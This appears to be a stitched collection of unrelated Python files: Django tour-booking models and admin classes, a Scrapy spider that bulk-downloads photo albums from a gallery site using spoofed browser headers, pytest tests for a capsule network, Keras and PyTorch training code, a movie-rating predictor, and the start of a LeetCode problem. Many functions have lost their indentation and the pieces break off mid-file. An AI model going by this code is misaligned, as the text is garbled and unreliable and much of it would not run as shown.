    def __str__(self):
        return self.text
class Order(models.Model):
    # A booking request for a tour; status moves Pending -> Accepted/Rejected/Canceled.
    tour = models.ForeignKey(Tour, name='tour', related_name='orders', on_delete=models.PROTECT)
    # NOTE(review): on_delete=False is not a valid deletion handler (Django
    # expects a callable such as models.SET_NULL); deleting the referenced
    # user would fail at collection time. Confirm and fix via a migration.
    user=models.ForeignKey(User,name='user',related_name='orders',blank=True,null=True, on_delete=False)
    first_name = models.CharField(max_length=250,default=None)
    last_name = models.CharField(max_length=280,default=None)
    mail = models.EmailField( max_length=200,default=None)
    ordered_at = models.DateTimeField(default=now)
    desired_date = models.DateField(default=now)
    person_quantity = models.PositiveIntegerField(default=0)
    phone_number = PhoneNumberField(default='')
    status = models.CharField(max_length=120)

    def save(self, *args, **kwargs):
        # NOTE(review): this forces status back to 'Pending' on EVERY save
        # through this method; accept()/reject()/cancel() below bypass it
        # via super().save(), which appears deliberate -- confirm.
        self.status = 'Pending'
        super().save(*args, **kwargs)

    def accept(self):
        self.status = 'Accepted'
        super().save()

    def reject(self):
        self.status = 'Rejected'
        super().save()

    def cancel(self):
        self.status = 'Canceled'
        super().save()

    def __str__(self):
        return self.tour.title

    class Meta:
        permissions = (('can_cancel', 'user can cancel'), ('can_accept', 'admin can approve or reject'))
class Images(models.Model):
    # Gallery image for a tour; is_main marks the cover image.
    # NOTE(review): on_delete=False is not a valid deletion handler; Django
    # expects a callable like models.CASCADE. Confirm and fix via migration.
    tour = models.ForeignKey(Tour, default=None, related_name='images', on_delete=False)
    image = models.ImageField(upload_to='pictures', verbose_name='Image')
    is_main = models.BooleanField(default=False)

    def make_main(self):
        # NOTE(review): despite the name, this TOGGLES is_main rather than
        # setting it True -- confirm intended semantics.
        self.is_main = not self.is_main
        self.save()
class Videos(models.Model):
    # Promotional video file attached to a tour.
    # NOTE(review): on_delete=False is not a valid deletion handler; Django
    # expects a callable like models.CASCADE. Confirm and fix via migration.
    tour = models.ForeignKey(Tour, default=None, related_name='videos', on_delete=False)
    video = models.FileField(upload_to='videos', verbose_name='Video')
class UserProfile(models.Model):
    # One-to-one profile extension storing the user's avatar image.
    user = models.OneToOneField(User, related_name='prof_image', on_delete=models.CASCADE)
    avatar = models.ImageField(upload_to='pictures', verbose_name='avatar', default='profile_pic.png')
|
17,010 | a26608c6c2db3af8d94515bec2067e043402305c | # -*- coding:utf-8 -*-
import scrapy
import re
import os
import urllib
import sys
import time
import urllib2
#from XiaMei_Crawler.items import XiaMeiPhotoAlbum
from ..items import XiaMeiPhotoAlbum
from scrapy.selector import Selector
from scrapy.http import HtmlResponse,Request
from urllib2 import URLError, HTTPError
print(os.getcwd())
#test = "https://www.nvshens.com/girl/21501/album/"
g_main_host = "https://www.nvshens.com"
#主目录
g_export_path_root = os.getcwd()+"/export_root"
#创建导出目录
if not os.path.exists(g_export_path_root):
os.makedirs(g_export_path_root)
#相片专辑
g_photoAlbumList = []
#是否导出相片
g_export_photo = True
def save_photo(response, album):
    """Collect full-size photo URLs from an album page into album['photos'].

    Thumbnail URLs contain an "/s" path segment; the full-size URL is
    reconstructed by cutting at the LAST "/s" and re-appending the file
    name. URLs without "/s" are assumed to already be full-size.
    """
    selector = Selector(response)
    # Every <img> inside the #hgallery container is one photo.
    thumb_urls = selector.xpath('//*[@id="hgallery"]/img/@src').extract()
    for thumb in thumb_urls:
        marker = thumb.rfind("/s")
        if marker == -1:
            full = thumb
        else:
            filename = thumb.split("/")[-1]
            full = thumb[:marker] + "/" + filename
        album['photos'].append(full)
# Extract the text content of an HTML fragment.
def get_html_content(html_label):
    """Return *html_label* with every <...> tag removed.

    The pattern is non-greedy, so only individual tags are stripped and the
    text between tags is preserved.
    """
    # Raw string avoids the invalid-escape-sequence warning that the
    # original "\<.*?\>" pattern produced (\< is just < to the re engine).
    tag_pattern = re.compile(r"<.*?>")
    return tag_pattern.sub('', html_label)
def get_page_source(url):
    """Download *url* with browser-like headers and return the raw body bytes.

    Returns the integer 0 as an error sentinel when the request fails for
    any reason; callers must check for it.  Python 2 only (urllib2).
    """
    headers = {'Accept': '*/*',
               'Accept-Language': 'en-US,en;q=0.8',
               'Cache-Control': 'max-age=0',
               'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36',
               'Connection': 'keep-alive',
               'Referer': 'http://www.nvshens.com/'
               }
    req = urllib2.Request(url, None, headers)
    try:
        response = urllib2.urlopen(req)
        page_source = response.read()
        return page_source
    except BaseException:
        # NOTE(review): BaseException also swallows KeyboardInterrupt/SystemExit;
        # consider narrowing to urllib2.URLError.
        print("AX ERROR :"+str(url))
        return 0
class XiaMei_spider(scrapy.spiders.Spider):
name="XiaMei"#定义爬虫名
allowed_domains=["nvshens.com"] #搜索的域名范围,也就是爬虫的约束区域,规定爬虫只爬取这个域名下的网页
g_girl_identifier = 0
f_girl_name = 0
def __init__(self, girl_id=None, *args, **kwargs):
self.g_girl_identifier = girl_id
if self.g_girl_identifier == None:
print("AX ---> please input girl id.")
exit(0)
print("girl id :%s" % (self.g_girl_identifier))
one_girl_url = os.path.join( g_main_host, "girl",self. g_girl_identifier )
print("one_girl_url:"+one_girl_url)
self.start_urls=[ one_girl_url ]
#解析
def parse(self, response):
start_url =response.url #爬取时请求的url
tmp = True
print("start url :"+start_url)
total_url = response.xpath('//*[@class="archive_more"]/a/@href').extract_first()
self.f_girl_name = response.xpath('//*[@id="post"]/div[2]/div/div[1]/h1/text()').extract_first()
print("girl_name:"+(self.f_girl_name))
if total_url == None:
print("No Total Page")
yield Request(url = start_url, callback=self.parse_album_url_one)
else:
total_url = g_main_host + total_url
print(" Total_url :"+total_url)
yield Request(url = total_url, callback=self.parse_album_url_total)
if tmp:
print("Temp Return...")
return
#没有全部的
def parse_album_url_one(self, response):
hxs=Selector(response)
items=hxs.xpath('//*[@class="igalleryli_div"]/a/@href').extract()
print("item len : %s " % len(items))
tmp_cnt = 0;
for i in range(len(items)):#遍历div个数
album_url = g_main_host + items[i]
print("AX --> one page request album url : "+album_url)
yield Request(url=album_url, callback=self.parse_album)
#debug 只处理一个目录的
#if(tmp_cnt == 0):
# break;
tmp_cnt = tmp_cnt + 1
#有全部的
def parse_album_url_total(self, response):
hxs=Selector(response)
items=hxs.xpath('//*[@class="igalleryli_div"]/a/@href').extract()
print("item len : %s " % len(items))
tmp_cnt = 0;
for i in range(len(items)):#遍历div个数
#需要访问的下个url, Examples: https://www.nvshens.com/g/22942/
album_url = g_main_host + items[i]
print("AX --> request album url : "+album_url)
yield Request(url=album_url, callback=self.parse_album)
#debug 只处理一个目录的
#if(tmp_cnt == 0):
# break;
tmp_cnt = tmp_cnt + 1
#print(items[i].split(" ")[1])
def parse_album(self, response):
first_url=response.url #爬取时请求的url
print("first_page:"+first_url)
hxs=Selector(response)
album_name = hxs.xpath('//*[@id="htilte"]').extract()[0]
album_desc = hxs.xpath('//*[@id="ddesc"]').extract()[0]
#album_photo_num = hxs.xpath('//*[@id="dinfo"]/span').extract()
album_desc_info = hxs.xpath('//*[@id="dinfo"]').extract()[0]
#print(album_name)
#print(album_desc)
#print(album_desc_info)
photoAlbum = XiaMeiPhotoAlbum()
photoAlbum['photos'] = []
photoAlbum['create_time'] = time.time()
photoAlbum['album_name'] = get_html_content(album_name)
#print(photoAlbum['album_name'])
photoAlbum['album_desc'] = get_html_content(album_desc)
#print(photoAlbum['album_desc'])
photoAlbum['album_desc_info'] = get_html_content(album_desc_info)
#print(photoAlbum['album_desc_info'])
#print("AX ---> org id:")
#print(id(photoAlbum))
save_photo(response, photoAlbum)
#print("AX ---> next page...")
all_next_page = hxs.xpath('//*[@id="pages"]/a/@href').extract()
next_page = all_next_page[-1]
next_page_url = g_main_host+next_page
#print("first next page")
#print(next_page_url)
yield Request(url=next_page_url, meta={'album':photoAlbum, 'first':first_url}, callback=self.parse_album_next_pages_new)
g_photoAlbumList.append(photoAlbum)
def parse_album_next_pages_new(self, response):
photoAlbum = response.meta['album']
save_photo(response, photoAlbum)
first_url = response.meta['first']
all_next_page = response.xpath('//*[@id="pages"]/a/@href').extract()
next_page = all_next_page[-1]
next_page_url = g_main_host+next_page
#print( "find next page" )
#print(first_url)
#print( next_page_url )
if ".html" in next_page_url:
#print(next_page_url)
yield Request(url=next_page_url, meta={'album':photoAlbum, 'first':first_url}, callback=self.parse_album_next_pages_new)
def closed(self, reson):
if g_export_photo == False:
print("AX dont export photos..")
return
print("AX closed --> album len %s" % (len(g_photoAlbumList)))
album_index = 1
for album in g_photoAlbumList:
#创建目录
#album_number_str = str(album_index).zfill(3)
album_number_str = ""
album_name = g_export_path_root + "/" +str(self.g_girl_identifier) + "_" + self.f_girl_name + "/"+album_number_str +"_"+ album["album_name"]
album_index = album_index + 1
if not os.path.exists( album_name ):
os.makedirs( album_name )
print("create album path :"+album_name)
#下载图片
print("all photo num :"+str(len(album['photos'])))
for photo_url in album['photos']:
photo_name = photo_url.split('/')[-1]
photo_save_path = album_name+"/"+photo_name
if not os.path.exists( photo_save_path ):
print("download photo :"+photo_url)
#urllib.urlretrieve(photo_url, photo_save_path)
photo_content = get_page_source(photo_url)
if photo_content != 0:
f = open(photo_save_path, 'wb')
f.write(photo_content)
f.close()
print(len(photo_content))
else:
print("404 found ..")
else:
print("photo exists... :"+photo_save_path)
#print(photo_url)
"""
print(len(album['photos']))
for photo_url in album['photos']:
print(photo_url)
"""
|
17,011 | 976bbc1c7c1a362337a6802b8ffa07985ba140c9 | '''To run these, run the following
pip install pytest
pytest (this file name)
'''
import os
import tensorflow as tf
import pytest
import numpy as np
from data_loader_wrapper import DataSplits
from run_from_config import EarlyStoppingHelper
from run_from_config import SAVE_EARLY_STOPPING_ACTION
from run_from_config import CONTINUE_EARLY_STOPPING_ACTION
from run_from_config import STOP_EARLY_STOPPING_ACTION
from run_from_config import run_from_config
from run_from_config import verify_restore_location
from run_from_config import run_epoch
import layer_models
from network_config import CrossEntropyLossInfo
from network_config import loss_info_from_dict
from network_config import NetworkConfig
from network_config import optimizer_info_from_dict
from network_graph import parameters_for_config_id
from network_graph import count_parameters
from network_graph import accuracy_ops
from storage import FolderPicker
@pytest.fixture()
def mock_config_id():
return 'test_config_id'
@pytest.fixture()
def mock_network_config(mock_config_id):
layers = layer_models.layers_from_list([
{'type': 'softmax_pred', 'num_classes': 10, 'id': 'prediction'},
{'type': 'argmax'},
])
return NetworkConfig(
config_id=mock_config_id,
data_provider_name='cifar10',
batch_size=1,
seed=1,
loss=loss_info_from_dict(
{'type': 'softmax_crossentropy', 'softmax_id': 'prediction'},
layers,
),
epochs=1,
layers=layers,
early_stop_after_n_epochs=1,
prediction_layer_idx=-1, # We don't use this, so put garbage number
optimizer_kwargs={},
)
# test early stopping helper
class TestEarlyStoppingHelper():
EARLY_STOP_AFTER_N = 3
def test_smoke(self):
es = EarlyStoppingHelper(self.EARLY_STOP_AFTER_N)
# first add a case where we should save
assert es.action_given_accuracy(0, 0.5) == SAVE_EARLY_STOPPING_ACTION
# then add something with a worse accuracy
assert es.action_given_accuracy(1, 0) == CONTINUE_EARLY_STOPPING_ACTION
# then add another thing with accuracy, but not as good as the first time
assert es.action_given_accuracy(2, 0.25) == CONTINUE_EARLY_STOPPING_ACTION
# then add something with great accuracy
assert es.action_given_accuracy(3, 1) == SAVE_EARLY_STOPPING_ACTION
# now do EARLY_STOP_AFTER_N rounds of worse accuracy
for i in range(self.EARLY_STOP_AFTER_N):
assert es.action_given_accuracy(4 + i, 0) == CONTINUE_EARLY_STOPPING_ACTION
# then the early stopping should kick in
assert es.action_given_accuracy(4 + self.EARLY_STOP_AFTER_N, 0) == STOP_EARLY_STOPPING_ACTION
# and if accidentally keep going, it should continue giving the same result
assert es.action_given_accuracy(5 + self.EARLY_STOP_AFTER_N, 0) == STOP_EARLY_STOPPING_ACTION
# and the best epoch should still be 3
assert es.best_epoch == 3
def test_disabled(self):
es = EarlyStoppingHelper()
# the only difference in this case is that it never says to stop
# first add a case where we should save
assert es.action_given_accuracy(0, 0.5) == SAVE_EARLY_STOPPING_ACTION
# then add something with a worse accuracy
assert es.action_given_accuracy(1, 0) == CONTINUE_EARLY_STOPPING_ACTION
# then add another thing with accuracy, but not as good as the first time
assert es.action_given_accuracy(2, 0.25) == CONTINUE_EARLY_STOPPING_ACTION
# then add something with great accuracy
assert es.action_given_accuracy(3, 1) == SAVE_EARLY_STOPPING_ACTION
# now do EARLY_STOP_AFTER_N rounds of worse accuracy
for i in range(100):
assert es.action_given_accuracy(4 + i, 0) == CONTINUE_EARLY_STOPPING_ACTION
class TestCapsnet():
CAPSNET_CONFIG = 'config/sample_capsnet.yaml'
def test_var_count(self, tmpdir):
p = tmpdir.mkdir("capsnettest")
network_config = NetworkConfig.parse_config(self.CAPSNET_CONFIG)
run_from_config(
str(p),
network_config,
True,
None,
)
variables = parameters_for_config_id(network_config)
# mnist capsnet set up like aguron's notebook should have this many params
assert count_parameters(variables) == 8215568
class TestRestore():
    """Unit tests for run_from_config.verify_restore_location."""

    # BUG FIX: the original class defined two methods both named
    # ``test_bad_last_folder``; the second definition silently shadowed the
    # first, so pytest only ever ran one of them.  The second case is renamed
    # so both execute.
    def test_bad_last_folder(self, mock_config_id, mock_network_config):
        # restore path whose final folder is appended after the config id
        with pytest.raises(ValueError):
            verify_restore_location(mock_network_config, mock_config_id + '/somethingelse')

    def test_bad_parent_folder(self, mock_config_id, mock_network_config):
        # restore path that does not contain the config id at all
        with pytest.raises(ValueError):
            verify_restore_location(mock_network_config, 'something/123')

    def test_good(self, mock_config_id, mock_network_config):
        # a valid location splits into (base_folder, checkpoint_id)
        assert verify_restore_location(mock_network_config, 'b/a/' + mock_config_id + '/123') == ('b/a', '123')

    def test_good_trailing_slash(self, mock_config_id, mock_network_config):
        # a trailing slash must not change the parsed result
        assert verify_restore_location(mock_network_config, 'b/a/' + mock_config_id + '/123/') == ('b/a', '123')
# Make a test for each config
@pytest.mark.parametrize("config_path", [
os.path.join('config/', filename)
for filename in os.listdir('config/')
])
def test_all_configs(tmpdir, config_path):
# This test just crashes if one of the configs can't be
# loaded or built
p = tmpdir.mkdir("smoke_test")
print(config_path)
tf.reset_default_graph()
network_config = NetworkConfig.parse_config(config_path)
run_from_config(
str(p),
network_config,
is_debug=True,
)
variables = parameters_for_config_id(network_config)
print(config_path, count_parameters(variables))
class TestAccuracy():
def test_compute_accuracy_with_diff_shapes(self, mock_network_config):
targets_placeholder = tf.placeholder(
np.int64,
[mock_network_config.batch_size],
'data-targets'
)
fake_inputs = np.ones((1, 32, 32)).astype(np.int64)
fake_targets = np.ones(1)
with tf.Session() as sess:
with pytest.raises(Exception):
acc = accuracy_ops(
mock_network_config,
targets_placeholder,
[layer_models.LayerResult(None, fake_inputs)],
)
acc.eval(feed_dict={targets_placeholder: fake_targets})
def test_compute_accuracy(self, mock_network_config):
batch_size = 2
targets_placeholder = tf.placeholder(
np.int64,
[batch_size],
'data-targets'
)
fake_inputs = np.ones((batch_size)).astype(np.int64)
fake_targets = np.ones(batch_size)
fake_targets_bad = np.zeros(batch_size)
fake_targets_both = np.hstack((
np.zeros(1),
np.ones(1),
))
with tf.Session() as sess:
acc = accuracy_ops(
mock_network_config,
targets_placeholder,
[layer_models.LayerResult(None, fake_inputs)],
)
assert np.isclose(acc.eval(feed_dict={targets_placeholder: fake_targets}), 1)
assert np.isclose(acc.eval(feed_dict={targets_placeholder: fake_targets_bad}), 0)
assert np.isclose(acc.eval(feed_dict={targets_placeholder: fake_targets_both}), 0.5)
class MockDataProivder():
    """Minimal iterator standing in for a data provider in tests.

    Yields the elements of *data* in order, exactly once.  (The misspelled
    name is kept because other tests in this file refer to it.)
    """

    def __init__(self, data):
        self.data = data
        self.i = 0
        # mirror the real provider's batch-count attribute
        self.num_batches = len(data)

    def __iter__(self):
        return self

    def __next__(self):
        try:
            item = self.data[self.i]
        except IndexError:
            raise StopIteration()
        self.i += 1
        return item
class TestRunEpoch():
NUM_BATCHES = 10
def test_run_epoch_0s(self, mock_network_config):
fake_data = np.zeros((self.NUM_BATCHES, 2))
data_splits = DataSplits(
train_data=MockDataProivder(fake_data),
val_data=[],
test_data=[],
)
def runner_func(input_batch, target_batch):
return (0, 0)
stats = run_epoch(
1,
mock_network_config,
data_splits,
'train_data',
runner_func
)
assert stats.accuracy == 0
assert stats.loss == 0
def test_run_epoch_mix(self, mock_network_config):
fake_data = np.zeros((self.NUM_BATCHES, 2))
data_splits = DataSplits(
train_data=MockDataProivder(fake_data),
val_data=[],
test_data=[],
)
FAKE_ACCURACY = 10
FAKE_LOSS = -55
def runner_func(input_batch, target_batch):
return (FAKE_LOSS, FAKE_ACCURACY)
stats = run_epoch(
1,
mock_network_config,
data_splits,
'train_data',
runner_func
)
# The average of a bunch of things that are the same is that thing
assert stats.accuracy == FAKE_ACCURACY
assert stats.loss == FAKE_LOSS
class TestFolderPicker():
def test_stats_folder_race_condition(self, tmpdir, mock_network_config):
p = tmpdir.mkdir("capsnettest")
# First time should be fine
FolderPicker(str(p), mock_network_config, '123')
# second time should raise
with pytest.raises(Exception):
FolderPicker(str(p), mock_network_config, '123')
def test_optimizer_info_from_dict():
assert optimizer_info_from_dict({})._asdict() == {
'learning_rate': 1e-3,
'beta1': 0.9,
}
assert optimizer_info_from_dict(
{'learning_rate': 5})._asdict() == {
'learning_rate': 5,
'beta1': 0.9,
}
assert optimizer_info_from_dict(
{'beta1': 5})._asdict() == {
'learning_rate': 1e-3,
'beta1': 5,
}
with pytest.raises(Exception):
optimizer_info_from_dict({'fake key': 1})
|
17,012 | 1669fd7dac22aac2d84f002f09c5c8a07ae241a5 | from lib.database import db
import lib.security as security
from lib.common_engine_functions import get_next_available_id, property_is_unique, save_document, get_all_documents
from datetime import datetime
def create(room, payer, receiver, amount, method):
    """Insert a new transaction document into the DB and return it.

    The document id comes from the shared sequential-id helper; the
    timestamp is recorded in UTC at creation time.
    """
    post = {
        '_id': get_next_available_id('transactions'),
        'room': room,
        'payer': payer,
        'receiver': receiver,
        'amount': amount,
        'method': method,
        'timestamp': datetime.utcnow(),
    }
    db['transactions'].insert_one(post)
    return post
def get_all(room):
    """Return every transaction document recorded for *room* as a list."""
    return list(db['transactions'].find({'room': room}))
# Need function to accumulate old payments into summarized entries
def combine_old(room):
    # TODO: not implemented — placeholder for compacting a room's historical
    # transactions into summarized entries (see comment above).
    pass
17,013 | ef04bc9afbdb5f96806d281376c5b6de46a3a7a0 | import pickle
import cv2
import numpy as np
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2D,MaxPooling2D,Dense,Flatten
from tensorflow.keras.optimizers import Adam
from sklearn.utils import shuffle
# Load three pickled image arrays (one pickle file per class), normalise the
# pixel values, and train a small CNN classifier saved to model.h5.
files=["sci.pkl","pal.pkl","roc.pkl"]
features=[]
labels=[]
for i in range(0,len(files)):
    # NOTE(review): the file handle from open() is never closed — prefer `with`.
    data=pickle.load(open(files[i],"rb"))
    for img in range(0,3001):
        features.append(data[img]/255)  # scale pixels to [0, 1]
        labels.append(i)                # class label == index into `files`
features,labels=shuffle(features,labels)
features,labels=np.array(features),np.array(labels)
# Each sample is a 112x63 single-channel image.
features=features.reshape(len(features),112,63,1)
model=Sequential()
model.add(Conv2D(1024,activation='relu',kernel_size=(4,4),input_shape=(112,63,1)))
model.add(MaxPooling2D(pool_size=(4,4)))
model.add(Conv2D(256,activation='relu',kernel_size=(4,4)))
model.add(MaxPooling2D(pool_size=(4,4)))
model.add(Flatten())
model.add(Dense(64,activation='relu'))
model.add(Dense(3,activation='softmax'))
# Integer class ids -> sparse_categorical_crossentropy.
model.compile(loss="sparse_categorical_crossentropy",optimizer=Adam(learning_rate=1e-3),metrics=['accuracy'])
model.summary()
model.fit(features,labels,epochs=2,batch_size=16)
model.save("model.h5")
|
17,014 | 19aa1a5ab3918daa3c1571262064a920435e1863 | #!/usr/bin/env python
from distutils.core import setup, Extension
# C extension module for the Earth Mover's Distance (EMD) routines.
EXTENSIONS = [dict(name="donuts.emd",
                   sources=["donuts/emd/pyemd.c", "donuts/emd/emd.c"],
                   extra_compile_args=['-g'])]

# Package metadata passed to setup().
# NOTE(review): distutils is removed in Python 3.12 — consider setuptools.
opts = dict(name='donuts',
            packages=['donuts',
                      'donuts.emd',
                      'donuts.deconv',
                      'donuts.data',
                      'donuts.spark'],
            ext_modules = [Extension(**e) for e in EXTENSIONS])

if __name__ == '__main__':
    setup(**opts)
|
17,015 | b20ccbe5cb9a2151fc2fc83310b9d17eb768a223 | import pandas as pd
from torch.utils.data import Dataset
from torchvision.datasets.folder import default_loader as read_image
from pathlib import Path
import torch
class FrameWindowDataset(Dataset):
    """
    Just like FrameFolderDataset, but its output is different.
    Here, for every frame t, we return a 4D tensor of size [T, C, H, W] where:
        T is the "time" component (ie multiple frames)
        C, H, W are the usual dimensions for an image (color, height, width).
    The size of T is determined by the window size.
    Given we can't see the future, we stack every frame at time t
    with t-1, t-2, ..., t-window_size and align it with the label for t.
    Windows do overlap each other.
    """

    def __init__(
        self,
        root,
        label_itos=['negative', 'positive'],
        transform=None,
        window_size=3,
        overlapping=True,
    ):
        """
        Args:
            root: directory containing ``data.csv`` plus the frames it references.
            label_itos: index-to-string label vocabulary.
            transform: optional transform applied to every frame image.
            window_size: number of consecutive frames stacked per sample (T).
            overlapping: if True windows advance 1 frame at a time, else by
                window_size (no overlap).
        """
        self.root = Path(root)
        self.label_itos = label_itos
        # string-to-index lookup derived from label_itos
        self.label_stoi = {label: i for i, label in enumerate(self.label_itos)}
        self.transform = transform
        self.window_size = window_size
        self.overlapping = overlapping
        # list of window_size-row DataFrame slices, one per sample
        self.chunks = self._chunkify()

    def __len__(self):
        return len(self.chunks)

    def __getitem__(self, idx):
        # Returns (frames, label): frames is a [T, C, H, W] tensor.
        chunk = self.chunks[idx]
        label = self.label_stoi[chunk.iloc[-1][
            'label']]  # Cannot see future, so label comes from last from input
        images = [
            read_image(self.root / image_path)
            for image_path in chunk['image_path']
        ]
        if self.transform:
            images = [self.transform(image) for image in images]
        # Stack along a new leading time axis -> [T, C, H, W]
        return torch.stack(images, dim=0), label

    def _chunkify(self):
        # Split data.csv rows into window_size-long slices; trailing rows that
        # cannot fill a complete window are dropped.
        df = pd.read_csv(self.root / 'data.csv')
        subsets = []
        offset = 1 if self.overlapping else self.window_size
        for start in range(0, df.shape[0], offset):
            if df.shape[0]-start < self.window_size:
                break
            df_subset = df.iloc[start:start + self.window_size]
            subsets.append(df_subset)
        return subsets

    def __repr__(self):
        message = (f"FrameWindowDataset with {len(self)} samples.\n")
        return message
|
17,016 | 76f02f903b216362565b8c29fa257a158a8b3869 | """empty message
Revision ID: f0538225efd3
Revises: 4b4604d66bb5
Create Date: 2021-08-22 21:36:12.376499
"""
# revision identifiers, used by Alembic.
revision = 'f0538225efd3'
down_revision = '4b4604d66bb5'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Add a non-nullable ``user_id`` FK column to ``pitch`` -> ``users.id``."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('pitch', sa.Column('user_id', sa.Integer(), nullable=False))
    op.create_foreign_key(None, 'pitch', 'users', ['user_id'], ['id'])
    # ### end Alembic commands ###
def downgrade():
    """Drop ``pitch.user_id`` and its foreign-key constraint."""
    # ### commands auto generated by Alembic - please adjust! ###
    # NOTE(review): dropping a constraint with name None only works when a
    # naming convention is configured (and not on SQLite) — confirm.
    op.drop_constraint(None, 'pitch', type_='foreignkey')
    op.drop_column('pitch', 'user_id')
    # ### end Alembic commands ###
|
17,017 | 29e50fb67816182be02a57e61a27fab0235ff457 | INVALID_JSON = "INVALID_JSON"
# Error-identifier string constants; each value mirrors its name so the
# codes are stable and self-describing when serialized.
HANDLER_CRASHED = "HANDLER_CRASHED"
SMS_NOT_CONFIGURED = "SMS_NOT_CONFIGURED"
SMS_COULD_NOT_BE_SENT = "SMS_COULD_NOT_BE_SENT"
TWILIO_NOT_SETUP = "TWILIO_NOT_SETUP"
|
17,018 | 39a417e4ad8fd441c397f34f7e3db37796633ee6 | from django.contrib import admin
from .models import Access, SetCtarl
@admin.register(Access)
class AccessAdmin(admin.ModelAdmin):
    """Admin configuration for the Access model."""
    # Columns shown in the change-list table.
    list_display = ['id', 'date', 'num']
    # Sidebar filters.
    list_filter = ['id', 'date', 'num']
    # Fields searchable from the admin search box (use '__' to cross FKs).
    search_fields = ['id', 'date', 'num']
    # Default ordering: newest id first.
    ordering = ['-id']
    # Auto-refresh intervals for the admin page.
    # NOTE(review): not a stock ModelAdmin option — presumably consumed by an
    # admin theme (e.g. SimpleUI); confirm it is actually in use.
    refresh_times = [5, 2]
@admin.register(SetCtarl)
class SetCtarlAdmin(admin.ModelAdmin):
    """Admin configuration for the SetCtarl model."""
    # Columns shown in the change-list table.
    list_display = ['id', 'name', 'is_start']
    # Sidebar filters.
    list_filter = ['id', 'name', 'is_start']
    # Fields searchable from the admin search box (use '__' to cross FKs).
    search_fields = ['id', 'name', 'is_start']
    # Default ordering: newest id first.
    ordering = ['-id']
    # Auto-refresh intervals for the admin page.
    # NOTE(review): not a stock ModelAdmin option — presumably consumed by an
    # admin theme (e.g. SimpleUI); confirm it is actually in use.
    refresh_times = [5, 2]
|
17,019 | 95ccd702e35801a80409c2f9ee6804cd9f722e3d | import sys
import time
from functools import reduce
import database_connector
import movie
import numpy as np
from sklearn.neural_network import MLPRegressor
from sklearn.model_selection import train_test_split
import ratingPredictor
def mltesting(movies):
nn = MLPRegressor(hidden_layer_sizes=100, activation="logistic", solver="adam", verbose=True, max_iter=3000)
x = []
y = []
for line in movies:
mlmovie = [line.runtimeMinutes, line.startYear, line.numVotes]
for i in range(10):
try:
mlmovie.append(line.actors[i].nconst[2:])
mlmovie.append(line.actors[i].ordering)
except IndexError:
mlmovie.append(0)
mlmovie.append(0)
print(mlmovie)
x.append(mlmovie)
y.append(line.averageRating)
x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=1, test_size=0.3)
x_train = np.array(x_train)
x_test = np.array(x_test)
nn.fit(x_train.astype(np.float64), y_train)
print(nn.score(x_test.astype(np.float64), y_test))
# print(nn.predict([[120, 2005, 60000]]))
def printallmovies(movies):
    """Print each movie's list representation, one per line.

    The loop variable is named ``entry`` because the original ``for movie in
    movies`` shadowed the module-level ``import movie``, which would break
    any later use of the module inside this scope.
    """
    for entry in movies:
        print(entry.getAsList())
# Gibt zeit und prozent aus
def _secondsToStr(t):
return "%d:%02d:%02d.%03d" % reduce(lambda ll, b: divmod(ll[0], b) + ll[1:], [(t * 1000,), 1000, 60, 60])
def _print_progress(p, start_time):
    """Overwrite the current console line with percent done and elapsed time."""
    sys.stdout.write("\r" + str(p) + "% \t Time elapsed: " + _secondsToStr(time.time() - start_time) + "s")
    sys.stdout.flush()
#Lädt die Filme aus der Datenbank ins Python Programm, befüllt das array movies
def loadDataBase():
start_time = time.time()
counter = 1
odd = True
db = database_connector.DataBase()
movies = []
print("Loading Database...")
query = db.get_valid_movies()
total = len(query)
for line in query:
newMovie = movie.Movie(line)
newMovie.addActors(db.get_crew_of_movie(newMovie.id))
movies.append(newMovie)
percentage = (counter / total) * 100
if (odd == True):
_print_progress(round(percentage, 2), start_time)
counter = counter + 1
odd = False
else:
odd = True
counter = counter + 1
db.closeConnection()
print("\nDatabase loaded.")
return movies
def createMovie(title, startYear, runtime, genre1, genre2, genre3, numVotes):
    """Build a Movie object from raw attributes.

    ``genre1`` is always included (even when empty, matching the original
    behavior); ``genre2``/``genre3`` are appended only when non-empty, giving
    a comma-separated genre string.
    """
    genre_parts = [genre1]
    for extra_genre in (genre2, genre3):
        if extra_genre != "":
            genre_parts.append(extra_genre)
    genres = ",".join(genre_parts)
    # Positional layout expected by movie.Movie:
    # [id, title, startYear, runtime, genres, rating, numVotes]
    return movie.Movie([0, title, startYear, runtime, genres, 0, numVotes])
def updateAvgRatings():
start_time = time.time()
counter = 1
db = database_connector.DataBase()
personids = db.get_all_person_id()
print(personids)
total = len(personids)
for person, averageR in personids:
if averageR is None:
avgRating = db.get_averagerating_by_id(person)
db.update_avg_rating(person,avgRating)
percentage = (counter / total) * 100
_print_progress(round(percentage, 2), start_time)
counter = counter + 1
if __name__ == '__main__':
ratingPredictor = ratingPredictor.ratingPredictor(loadDataBase())
ratingPredictor.learn(algorithm='neural')
#print(ratingPredictor.plot_ratings())
#loadDataBase()
ourMovie = createMovie("Wolf ;)",1994,125,"Drama","Horror","Romance",49989)
ourMovie.addCrewByName("Jack Nicholson", "actor")
ourMovie.addCrewByName("Michelle Pfeiffer", "actress")
ourMovie.addCrewByName("James Spader", "actor")
ourMovie.addCrewByName("Ennio Morricone", "composer")
ourMovie.addCrewByName("Mike Nichols", "director")
#ourMovie.addCrewByName("Giuseppe Rotunno", "cinematographer")
ourMovie.addCrewByName("Jim Harrison", "writer")
#ourMovie.addCrewByName("Kate Nelligan", "actress")
ourMovie.addCrewByName("Wesley Strick", "writer")
ourMovie.addCrewByName("Douglas Wick", "producer")
print(ourMovie.getAsString())
print(ratingPredictor.predictMovie(ourMovie))
|
17,020 | 501cd02f8182b73496e07204edc8687c273bf91e | """
5703. Maximum Average Pass Ratio
There is a school that has classes of students and each class will be having a final exam. You are given a 2D integer array classes, where classes[i] = [passi, totali]. You know beforehand that in the ith class, there are totali total students, but only passi number of students will pass the exam.
You are also given an integer extraStudents. There are another extraStudents brilliant students that are guaranteed to pass the exam of any class they are assigned to. You want to assign each of the extraStudents students to a class in a way that maximizes the average pass ratio across all the classes.
The pass ratio of a class is equal to the number of students of the class that will pass the exam divided by the total number of students of the class. The average pass ratio is the sum of pass ratios of all the classes divided by the number of the classes.
